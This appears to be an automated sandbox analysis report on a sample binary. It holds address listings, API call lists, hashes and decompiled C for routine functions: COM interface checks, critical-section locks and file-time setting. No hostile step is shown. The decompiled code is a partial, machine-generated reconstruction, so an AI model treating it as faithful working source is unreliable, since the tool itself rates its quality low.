                                                                                                    0x004164de
                                                                                                    0x004164e0
                                                                                                    0x004164e5
                                                                                                    0x00000000
                                                                                                    0x004164e7
                                                                                                    0x004164e7
                                                                                                    0x004164e7
                                                                                                    0x00416526
                                                                                                    0x0041652e
                                                                                                    0x00416531
                                                                                                    0x00416531
                                                                                                    0x004164e5
                                                                                                    0x004164d3
                                                                                                    0x004164ce
                                                                                                    0x0041658e
                                                                                                    0x0041659d
                                                                                                    0x0041659f
                                                                                                    0x004165a9
                                                                                                    0x004165ab
                                                                                                    0x004165ab
                                                                                                    0x004165a9
                                                                                                    0x004165b0
                                                                                                    0x004165b6
                                                                                                    0x004165ba
                                                                                                    0x004165bb
                                                                                                    0x004165c7
                                                                                                    0x004165c9
                                                                                                    0x004165c9
                                                                                                    0x004165d3
                                                                                                    0x004165d8
                                                                                                    0x00416637
                                                                                                    0x00416637
                                                                                                    0x00000000
                                                                                                    0x004165da
                                                                                                    0x004165e0
                                                                                                    0x004165e5
                                                                                                    0x004165e9
                                                                                                    0x00000000
                                                                                                    0x004165eb
                                                                                                    0x004165ef
                                                                                                    0x0041663f
                                                                                                    0x0041663f
                                                                                                    0x004165f1
                                                                                                    0x004165f1
                                                                                                    0x004165fd
                                                                                                    0x0041661c
                                                                                                    0x00416620
                                                                                                    0x00416632
                                                                                                    0x00000000
                                                                                                    0x00416622
                                                                                                    0x00416622
                                                                                                    0x00416622
                                                                                                    0x00416620
                                                                                                    0x004165fd
                                                                                                    0x004165ef
                                                                                                    0x004165e9
                                                                                                    0x00416651
                                                                                                    0x00000000
                                                                                                    0x00416657
                                                                                                    0x00416657
                                                                                                    0x0041665d
                                                                                                    0x00416848
                                                                                                    0x00416663
                                                                                                    0x00416665
                                                                                                    0x00416667
                                                                                                    0x0041666e
                                                                                                    0x00416674
                                                                                                    0x00416682
                                                                                                    0x00416688
                                                                                                    0x00416692
                                                                                                    0x0041669d
                                                                                                    0x00416694
                                                                                                    0x00416698
                                                                                                    0x00416698
                                                                                                    0x004166be
                                                                                                    0x004166c2
                                                                                                    0x004166cc
                                                                                                    0x004166cc
                                                                                                    0x004166c2
                                                                                                    0x004166dc
                                                                                                    0x004166e3
                                                                                                    0x004166e5
                                                                                                    0x004166e8
                                                                                                    0x004166f2
                                                                                                    0x004166f8
                                                                                                    0x004166fb
                                                                                                    0x00416701
                                                                                                    0x0041670c
                                                                                                    0x00416703
                                                                                                    0x00416703
                                                                                                    0x00416703
                                                                                                    0x00416718
                                                                                                    0x00416722
                                                                                                    0x00416735
                                                                                                    0x0041673a
                                                                                                    0x0041673c
                                                                                                    0x0041673c
                                                                                                    0x00000000
                                                                                                    0x00416740
                                                                                                    0x00416742
                                                                                                    0x00416756
                                                                                                    0x0041675a
                                                                                                    0x00416764
                                                                                                    0x00416767
                                                                                                    0x00416767
                                                                                                    0x0041675a
                                                                                                    0x0041676c
                                                                                                    0x00416773
                                                                                                    0x00416775
                                                                                                    0x00416775
                                                                                                    0x0041677e
                                                                                                    0x00416787
                                                                                                    0x0041678f
                                                                                                    0x00416796
                                                                                                    0x00416796
                                                                                                    0x0041679c
                                                                                                    0x004167a3
                                                                                                    0x004167ac
                                                                                                    0x004167a5
                                                                                                    0x004167a5
                                                                                                    0x004167a5
                                                                                                    0x004167b6
                                                                                                    0x004167c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004167ca
                                                                                                    0x004167f7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004167cc
                                                                                                    0x004167d0
                                                                                                    0x004167d9
                                                                                                    0x004167db
                                                                                                    0x004167df
                                                                                                    0x004167e1
                                                                                                    0x004167e1
                                                                                                    0x004167df
                                                                                                    0x004167e3
                                                                                                    0x004167e9
                                                                                                    0x00000000
                                                                                                    0x004167e9
                                                                                                    0x00416724
                                                                                                    0x00416726
                                                                                                    0x0041683f
                                                                                                    0x00000000
                                                                                                    0x0041683f
                                                                                                    0x0041672c
                                                                                                    0x004167fb
                                                                                                    0x004167fb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00416803
                                                                                                    0x00416805
                                                                                                    0x00416810
                                                                                                    0x00416490
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00416810
                                                                                                    0x00416722
                                                                                                    0x0041665d
                                                                                                    0x00000000
                                                                                                    0x00416651
                                                                                                    0x00416829
                                                                                                    0x00416832
                                                                                                    0x0041683c
                                                                                                    0x0041683c
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                      • Part of subcall function 00417E00: WaitForSingleObject.KERNEL32(?,000000FF,003C9BE4,?), ref: 00417E03
                                                                                                      • Part of subcall function 00417E00: GetLastError.KERNEL32(?,000000FF,003C9BE4,?), ref: 00417E0E
                                                                                                      • Part of subcall function 00416D10: EnterCriticalSection.KERNEL32(?,?,?,004164A9), ref: 00416D18
                                                                                                      • Part of subcall function 00416D10: LeaveCriticalSection.KERNEL32(?,?,?,004164A9), ref: 00416D22
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0041666E
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00416688
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 004166F2
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00416718
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0041677E
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 004167B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2116739831-0
                                                                                                    • Opcode ID: 8a03f39b73611b6956ddfd79e67e53ce7c3ed973003649f82dbab60c688ff74d
                                                                                                    • Instruction ID: 4a1dee2d66e7c5c956dc389d0057129f0b88d168c0dba5e8035ae0e4a0788dac
                                                                                                    • Opcode Fuzzy Hash: 8a03f39b73611b6956ddfd79e67e53ce7c3ed973003649f82dbab60c688ff74d
                                                                                                    • Instruction Fuzzy Hash: 92C16E756047018FC720DF29D580BA7B7E2FF88314F11492EE9AA87351EB38E985CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C30BE Relevance: 7.6, APIs: 6, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 61%
                                                                                                    			E003C30BE(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t15;
				signed int _t16;
				void* _t19;
				signed int _t20;
				signed int _t23;
				intOrPtr _t24;
				signed int* _t25;

				_t25 = _a12;
				_t24 = _a8;
				 *_t25 =  *_t25 & 0x00000000;
				_t19 = 0x10;
				_push(_t19);
				_push(0x42fe10);
				_push(_t24);
				L0041F374();
				if(_t15 == 0) {
					L2:
					_t16 = _a4;
					_t20 = _t16;
					_t23 = _t16 + 4;
					L11:
					asm("sbb ecx, ecx");
					 *_t25 =  ~_t20 & _t23;
					 *((intOrPtr*)(_t16 + 0x18)) =  *((intOrPtr*)(_t16 + 0x18)) + 1;
					return 0;
				}
				_push(_t19);
				_push(0x42d0a0);
				_push(_t24);
				L0041F374();
				if(_t15 != 0) {
					_push(_t19);
					_push(0x42d1a0);
					_push(_t24);
					L0041F374();
					if(_t15 != 0) {
						_push(_t19);
						_push(0x42d1c0);
						_push(_t24);
						L0041F374();
						if(_t15 != 0) {
							_push(_t19);
							_push(0x42d140);
							_push(_t24);
							L0041F374();
							if(_t15 != 0) {
								_push(_t19);
								_push(0x42d150);
								_push(_t24);
								L0041F374();
								if(_t15 != 0) {
									return 0x80004002;
								}
								_t16 = _a4;
								_t20 = _t16;
								_t23 = _t16 + 0x14;
								goto L11;
							}
							_t16 = _a4;
							_t20 = _t16;
							_t23 = _t16 + 0x10;
							goto L11;
						}
						_t16 = _a4;
						_t20 = _t16;
						_t23 = _t16 + 0xc;
						goto L11;
					}
					_t16 = _a4;
					_t20 = _t16;
					_t23 = _t16 + 8;
					goto L11;
				}
				goto L2;
			}










                                                                                                    0x003c30c3
                                                                                                    0x003c30c7
                                                                                                    0x003c30cc
                                                                                                    0x003c30cf
                                                                                                    0x003c30d0
                                                                                                    0x003c30d1
                                                                                                    0x003c30d6
                                                                                                    0x003c30d7
                                                                                                    0x003c30e1
                                                                                                    0x003c30f6
                                                                                                    0x003c30f6
                                                                                                    0x003c30f9
                                                                                                    0x003c30fb
                                                                                                    0x003c3172
                                                                                                    0x003c3174
                                                                                                    0x003c3178
                                                                                                    0x003c317a
                                                                                                    0x00000000
                                                                                                    0x003c317d
                                                                                                    0x003c30e3
                                                                                                    0x003c30e4
                                                                                                    0x003c30e9
                                                                                                    0x003c30ea
                                                                                                    0x003c30f4
                                                                                                    0x003c3100
                                                                                                    0x003c3101
                                                                                                    0x003c3106
                                                                                                    0x003c3107
                                                                                                    0x003c3111
                                                                                                    0x003c311d
                                                                                                    0x003c311e
                                                                                                    0x003c3123
                                                                                                    0x003c3124
                                                                                                    0x003c312e
                                                                                                    0x003c313a
                                                                                                    0x003c313b
                                                                                                    0x003c3140
                                                                                                    0x003c3141
                                                                                                    0x003c314b
                                                                                                    0x003c3157
                                                                                                    0x003c3158
                                                                                                    0x003c315d
                                                                                                    0x003c315e
                                                                                                    0x003c3168
                                                                                                    0x00000000
                                                                                                    0x003c3181
                                                                                                    0x003c316a
                                                                                                    0x003c316d
                                                                                                    0x003c316f
                                                                                                    0x00000000
                                                                                                    0x003c316f
                                                                                                    0x003c314d
                                                                                                    0x003c3150
                                                                                                    0x003c3152
                                                                                                    0x00000000
                                                                                                    0x003c3152
                                                                                                    0x003c3130
                                                                                                    0x003c3133
                                                                                                    0x003c3135
                                                                                                    0x00000000
                                                                                                    0x003c3135
                                                                                                    0x003c3113
                                                                                                    0x003c3116
                                                                                                    0x003c3118
                                                                                                    0x00000000
                                                                                                    0x003c3118
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1475443563-0
                                                                                                    • Opcode ID: 3672b0e645058b565f1d1b38483c456905dcddf5c591239901ad4e7aa1801de8
                                                                                                    • Instruction ID: 37372b74a2dc711cc48cb16b4688a067ecdc3ef15d4a15ff0ec9ec8890733338
                                                                                                    • Opcode Fuzzy Hash: 3672b0e645058b565f1d1b38483c456905dcddf5c591239901ad4e7aa1801de8
                                                                                                    • Instruction Fuzzy Hash: AF21C172700208AFD706AA11DC42FBB33AC9B51764F1A822EFD05CA251E624EE468395
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BAD0A Relevance: 7.6, APIs: 6, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 61%
                                                                                                    			E003BAD0A(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t14;
				signed int _t15;
				void* _t18;
				signed int _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t24;

				_t24 = _a12;
				_t23 = _a8;
				 *_t24 =  *_t24 & 0x00000000;
				_t18 = 0x10;
				_push(_t18);
				_push(0x42fe10);
				_push(_t23);
				L0041F374();
				if(_t14 != 0) {
					_push(_t18);
					_push(0x42d000);
					_push(_t23);
					L0041F374();
					if(_t14 == 0) {
						goto L1;
					}
					_push(_t18);
					_push(0x42d020);
					_push(_t23);
					L0041F374();
					if(_t14 != 0) {
						_push(_t18);
						_push(0x42d040);
						_push(_t23);
						L0041F374();
						if(_t14 != 0) {
							_push(_t18);
							_push(0x42d050);
							_push(_t23);
							L0041F374();
							if(_t14 != 0) {
								_push(_t18);
								_push(0x42d060);
								_push(_t23);
								L0041F374();
								if(_t14 != 0) {
									return 0x80004002;
								}
								_t15 = _a4;
								_t19 = _t15;
								_t22 = _t15 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t24 =  ~_t19 & _t22;
								L12:
								 *((intOrPtr*)(_t15 + 0x14)) =  *((intOrPtr*)(_t15 + 0x14)) + 1;
								return 0;
							}
							_t15 = _a4;
							_t19 = _t15;
							_t22 = _t15 + 0xc;
							goto L11;
						}
						_t15 = _a4;
						_t19 = _t15;
						_t22 = _t15 + 8;
						goto L11;
					}
					_t15 = _a4;
					_t19 = _t15;
					_t22 = _t15 + 4;
					goto L11;
				}
				L1:
				_t15 = _a4;
				 *_t24 = _t15;
				goto L12;
			}










                                                                                                    0x003bad0f
                                                                                                    0x003bad13
                                                                                                    0x003bad18
                                                                                                    0x003bad1b
                                                                                                    0x003bad1c
                                                                                                    0x003bad1d
                                                                                                    0x003bad22
                                                                                                    0x003bad23
                                                                                                    0x003bad2d
                                                                                                    0x003bad39
                                                                                                    0x003bad3a
                                                                                                    0x003bad3f
                                                                                                    0x003bad40
                                                                                                    0x003bad4a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003bad4c
                                                                                                    0x003bad4d
                                                                                                    0x003bad52
                                                                                                    0x003bad53
                                                                                                    0x003bad5d
                                                                                                    0x003bad69
                                                                                                    0x003bad6a
                                                                                                    0x003bad6f
                                                                                                    0x003bad70
                                                                                                    0x003bad7a
                                                                                                    0x003bad86
                                                                                                    0x003bad87
                                                                                                    0x003bad8c
                                                                                                    0x003bad8d
                                                                                                    0x003bad97
                                                                                                    0x003bada3
                                                                                                    0x003bada4
                                                                                                    0x003bada9
                                                                                                    0x003badaa
                                                                                                    0x003badb4
                                                                                                    0x00000000
                                                                                                    0x003badcd
                                                                                                    0x003badb6
                                                                                                    0x003badb9
                                                                                                    0x003badbb
                                                                                                    0x003badbe
                                                                                                    0x003badc0
                                                                                                    0x003badc4
                                                                                                    0x003badc6
                                                                                                    0x003badc6
                                                                                                    0x00000000
                                                                                                    0x003badc9
                                                                                                    0x003bad99
                                                                                                    0x003bad9c
                                                                                                    0x003bad9e
                                                                                                    0x00000000
                                                                                                    0x003bad9e
                                                                                                    0x003bad7c
                                                                                                    0x003bad7f
                                                                                                    0x003bad81
                                                                                                    0x00000000
                                                                                                    0x003bad81
                                                                                                    0x003bad5f
                                                                                                    0x003bad62
                                                                                                    0x003bad64
                                                                                                    0x00000000
                                                                                                    0x003bad64
                                                                                                    0x003bad2f
                                                                                                    0x003bad2f
                                                                                                    0x003bad32
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1475443563-0
                                                                                                    • Opcode ID: 3eb1dec5f6ae270d618ed2c86b17f7b613897b0db5bd423c14e1811df9238a91
                                                                                                    • Instruction ID: 2b196a6ee36e59d0f06a63f61f1d91d9d0b81801cac3bbef683d5d9ff5e4a63f
                                                                                                    • Opcode Fuzzy Hash: 3eb1dec5f6ae270d618ed2c86b17f7b613897b0db5bd423c14e1811df9238a91
                                                                                                    • Instruction Fuzzy Hash: 27214371700A08BBD7014A11DC92FFE33AC9B413ADF21422EFE419BA11F634FC058296
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D7689 Relevance: 7.6, APIs: 6, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 61%
                                                                                                    			E003D7689(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t14;
				signed int _t15;
				void* _t18;
				signed int _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t24;

				_t24 = _a12;
				_t23 = _a8;
				 *_t24 =  *_t24 & 0x00000000;
				_t18 = 0x10;
				_push(_t18);
				_push(0x42fe10);
				_push(_t23);
				L0041F374();
				if(_t14 != 0) {
					_push(_t18);
					_push(0x42d1d0);
					_push(_t23);
					L0041F374();
					if(_t14 == 0) {
						goto L1;
					}
					_push(_t18);
					_push(0x42d2a0);
					_push(_t23);
					L0041F374();
					if(_t14 != 0) {
						_push(_t18);
						_push(0x42cfe0);
						_push(_t23);
						L0041F374();
						if(_t14 != 0) {
							_push(_t18);
							_push(0x42d250);
							_push(_t23);
							L0041F374();
							if(_t14 != 0) {
								_push(_t18);
								_push(0x42d230);
								_push(_t23);
								L0041F374();
								if(_t14 != 0) {
									return 0x80004002;
								}
								_t15 = _a4;
								_t19 = _t15;
								_t22 = _t15 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t24 =  ~_t19 & _t22;
								L12:
								 *((intOrPtr*)(_t15 + 0x14)) =  *((intOrPtr*)(_t15 + 0x14)) + 1;
								return 0;
							}
							_t15 = _a4;
							_t19 = _t15;
							_t22 = _t15 + 0xc;
							goto L11;
						}
						_t15 = _a4;
						_t19 = _t15;
						_t22 = _t15 + 8;
						goto L11;
					}
					_t15 = _a4;
					_t19 = _t15;
					_t22 = _t15 + 4;
					goto L11;
				}
				L1:
				_t15 = _a4;
				 *_t24 = _t15;
				goto L12;
			}










                                                                                                    0x003d768e
                                                                                                    0x003d7692
                                                                                                    0x003d7697
                                                                                                    0x003d769a
                                                                                                    0x003d769b
                                                                                                    0x003d769c
                                                                                                    0x003d76a1
                                                                                                    0x003d76a2
                                                                                                    0x003d76ac
                                                                                                    0x003d76b8
                                                                                                    0x003d76b9
                                                                                                    0x003d76be
                                                                                                    0x003d76bf
                                                                                                    0x003d76c9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d76cb
                                                                                                    0x003d76cc
                                                                                                    0x003d76d1
                                                                                                    0x003d76d2
                                                                                                    0x003d76dc
                                                                                                    0x003d76e8
                                                                                                    0x003d76e9
                                                                                                    0x003d76ee
                                                                                                    0x003d76ef
                                                                                                    0x003d76f9
                                                                                                    0x003d7705
                                                                                                    0x003d7706
                                                                                                    0x003d770b
                                                                                                    0x003d770c
                                                                                                    0x003d7716
                                                                                                    0x003d7722
                                                                                                    0x003d7723
                                                                                                    0x003d7728
                                                                                                    0x003d7729
                                                                                                    0x003d7733
                                                                                                    0x00000000
                                                                                                    0x003d774c
                                                                                                    0x003d7735
                                                                                                    0x003d7738
                                                                                                    0x003d773a
                                                                                                    0x003d773d
                                                                                                    0x003d773f
                                                                                                    0x003d7743
                                                                                                    0x003d7745
                                                                                                    0x003d7745
                                                                                                    0x00000000
                                                                                                    0x003d7748
                                                                                                    0x003d7718
                                                                                                    0x003d771b
                                                                                                    0x003d771d
                                                                                                    0x00000000
                                                                                                    0x003d771d
                                                                                                    0x003d76fb
                                                                                                    0x003d76fe
                                                                                                    0x003d7700
                                                                                                    0x00000000
                                                                                                    0x003d7700
                                                                                                    0x003d76de
                                                                                                    0x003d76e1
                                                                                                    0x003d76e3
                                                                                                    0x00000000
                                                                                                    0x003d76e3
                                                                                                    0x003d76ae
                                                                                                    0x003d76ae
                                                                                                    0x003d76b1
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1475443563-0
                                                                                                    • Opcode ID: 48b5f638a123296349867999e958b4610d1b0c9265cfb24a9c2aedc90edc01eb
                                                                                                    • Instruction ID: 2f1fe338d9f6a1bb8105ef0f314cc77179871b242688abe956acfa721024fcd4
                                                                                                    • Opcode Fuzzy Hash: 48b5f638a123296349867999e958b4610d1b0c9265cfb24a9c2aedc90edc01eb
                                                                                                    • Instruction Fuzzy Hash: B521C272704208BFD7054A25EC82FBA33AC9B51794F22452BFD459B341F724FD4482A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B5695 Relevance: 7.6, APIs: 5, Instructions: 72filetimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B5695(WCHAR* __ecx, FILETIME* __edx) {
				intOrPtr _t31;
				signed int _t35;
				void* _t39;
				signed int _t42;
				void* _t57;

				E0041F1B0(E00422D8C, _t57);
				 *(_t57 - 0x10) =  *(_t57 - 0x10) | 0xffffffff;
				 *(_t57 - 0x1c) = __edx;
				 *(_t57 - 0x18) = __ecx;
				_t31 = E003B8717(__ecx);
				 *((intOrPtr*)(_t57 - 0x14)) = _t31;
				if(_t31 == 1) {
					L2:
					if( *((intOrPtr*)(_t57 - 0x14)) != 0) {
						_t35 = E003B2D47(_t57 - 0x28);
						 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
						if(E003B8820( *(_t57 - 0x18), _t57 - 0x28, _t57, _t35 & 0xffffff00 |  *((intOrPtr*)(_t57 - 0x14)) != 0x00000001) != 0) {
							 *(_t57 - 0x10) = CreateFileW( *(_t57 - 0x28), 0x40000000, 3, 0, 3, 0x2000000, 0);
						}
						E003B1E40(_t37,  *(_t57 - 0x28));
					}
					L6:
					_t42 = 0;
					if( *(_t57 - 0x10) != 0xffffffff) {
						_t42 = 0 | SetFileTime( *(_t57 - 0x10),  *(_t57 - 0x1c),  *(_t57 + 8),  *(_t57 + 0xc)) != 0x00000000;
						CloseHandle( *(_t57 - 0x10));
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
					return _t42;
				}
				_t39 = CreateFileW( *(_t57 - 0x18), 0x40000000, 3, 0, 3, 0x2000000, 0);
				 *(_t57 - 0x10) = _t39;
				if(_t39 != 0xffffffff) {
					goto L6;
				}
				goto L2;
			}








                                                                                                    0x003b569a
                                                                                                    0x003b56a2
                                                                                                    0x003b56a9
                                                                                                    0x003b56ac
                                                                                                    0x003b56af
                                                                                                    0x003b56bd
                                                                                                    0x003b56ca
                                                                                                    0x003b56e3
                                                                                                    0x003b56e7
                                                                                                    0x003b56ec
                                                                                                    0x003b56f1
                                                                                                    0x003b570a
                                                                                                    0x003b571b
                                                                                                    0x003b571b
                                                                                                    0x003b5721
                                                                                                    0x003b5726
                                                                                                    0x003b5727
                                                                                                    0x003b5727
                                                                                                    0x003b572d
                                                                                                    0x003b5746
                                                                                                    0x003b5749
                                                                                                    0x003b5749
                                                                                                    0x003b5757
                                                                                                    0x003b575f
                                                                                                    0x003b575f
                                                                                                    0x003b56d9
                                                                                                    0x003b56de
                                                                                                    0x003b56e1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B569A
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000000,?,?,?,?,?), ref: 003B56D9
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000000,?,?,00000000,?,?,?,?,?), ref: 003B5719
                                                                                                    • SetFileTime.KERNEL32(000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 003B573B
                                                                                                    • CloseHandle.KERNEL32(000000FF,?,00000000,?,?,?,?,?,?,?), ref: 003B5749
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Create$CloseH_prologHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 213185242-0
                                                                                                    • Opcode ID: b0e4c498d2006b2ff6875922451616b3ac1cd6ec3b5474f62d1cd9cacf4cbb69
                                                                                                    • Instruction ID: 8c6c677bb410af703e4c55a593586a1ab328a528ae1db0a978f67c5f73136b1d
                                                                                                    • Opcode Fuzzy Hash: b0e4c498d2006b2ff6875922451616b3ac1cd6ec3b5474f62d1cd9cacf4cbb69
                                                                                                    • Instruction Fuzzy Hash: 7F217F31E0021AEBDF229FA4DC46BEEBB79EF44328F104229E620765E0C7754A45DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C830 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040C830(int* __esi) {
				int _t30;
				int* _t31;

				_t31 = __esi;
				_t30 = 0;
				if(__esi[5] == 0) {
					if(__esi[7] == 0) {
						exit(1);
					}
					LeaveCriticalSection( &(_t31[0xe]));
					_t30 =  *_t31;
					_t10 = _t30 + 1; // 0x1
					 *_t31 = _t10;
					_t31[7] = 0;
					E00418050( &(_t31[0xc]));
				} else {
					if(__esi[7] != 0) {
						exit(1);
					}
					 *_t31 = 1;
					_t31[5] = 0;
					_t31[9] = 0;
					_t31[8] = 0;
					L00417F40( &(_t31[0xb]));
					L00417F20( &(_t31[0xa]));
				}
				L00417E00(_t31[0xd]);
				if(_t31[7] != 0) {
					exit(1);
				}
				EnterCriticalSection( &(_t31[0xe]));
				_t31[7] = 1;
				return _t30;
			}





                                                                                                    0x0040c830
                                                                                                    0x0040c834
                                                                                                    0x0040c839
                                                                                                    0x0040c86b
                                                                                                    0x0040c86f
                                                                                                    0x0040c86f
                                                                                                    0x0040c878
                                                                                                    0x0040c87e
                                                                                                    0x0040c880
                                                                                                    0x0040c883
                                                                                                    0x0040c888
                                                                                                    0x0040c88b
                                                                                                    0x0040c83b
                                                                                                    0x0040c83e
                                                                                                    0x0040c842
                                                                                                    0x0040c842
                                                                                                    0x0040c84a
                                                                                                    0x0040c850
                                                                                                    0x0040c853
                                                                                                    0x0040c856
                                                                                                    0x0040c859
                                                                                                    0x0040c861
                                                                                                    0x0040c861
                                                                                                    0x0040c893
                                                                                                    0x0040c89b
                                                                                                    0x0040c89f
                                                                                                    0x0040c89f
                                                                                                    0x0040c8a8
                                                                                                    0x0040c8b1
                                                                                                    0x0040c8b9

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
